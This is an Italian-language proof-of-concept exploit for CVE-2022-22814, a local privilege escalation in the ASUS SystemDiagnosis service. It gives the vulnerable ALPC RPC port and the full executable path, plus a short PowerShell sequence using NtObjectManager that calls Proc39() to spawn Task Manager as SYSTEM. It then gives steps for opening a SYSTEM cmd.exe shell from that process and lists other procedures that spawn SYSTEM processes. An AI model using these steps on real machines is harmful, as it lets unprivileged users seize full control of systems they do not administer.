
Exploit proof-of-concept per CVE-2022-22814 che dimostra l'escalation dei privilegi locale su Windows tramite l'interfaccia RPC ALPC vulnerabile di ASUS SystemDiagnosis.
Percorso completo: C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
Problema:
La porta ALPC \RPC Control\ASHWTestServer, esposta da AsusSystemDiagnosis.exe, è completamente accessibile a qualsiasi utente. Chiamare Proc39() tramite RPC attraverso questa porta genera un processo taskmgr.exe come SYSTEM nella sessione dell'utente corrente.
Sfruttamento:
Utilizzando lo strumento RPC NtObjectManager di Project Zero da https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools (assicurati di prendere la versione compilata), è possibile connettersi alla porta RPC vulnerabile, momento in cui può essere chiamata Proc39(). Una volta generato il processo taskmgr.exe come SYSTEM, è possibile creare una shell cmd.exe utilizzando la funzionalità "Esegui nuova attività" tramite il menu contestuale, File > Esegui nuova attività > cmd.exe.
NtObjectManager:
$server = get-rpcserver C:\WINDOWS\System32\DriverStore\FileRepository\asussci2.inf_amd64_d385bdc0d33d66f9\ASUSSystemDiagnosis\AsusSystemDiagnosis.exe
$client = get-rpcclient $server
$client.connect()
$client.Proc39()
Come sopra, ma genera mmc.exe come SYSTEM. È possibile creare una nuova attività oppure usare la funzionalità di navigazione per aprire una finestra di explorer.exe ed eseguire cmd.exe dalla barra degli indirizzi.
Proc53() - genera systemreset.exe come SYSTEM Proc54() - genera RecoveryDrive.exe come SYSTEM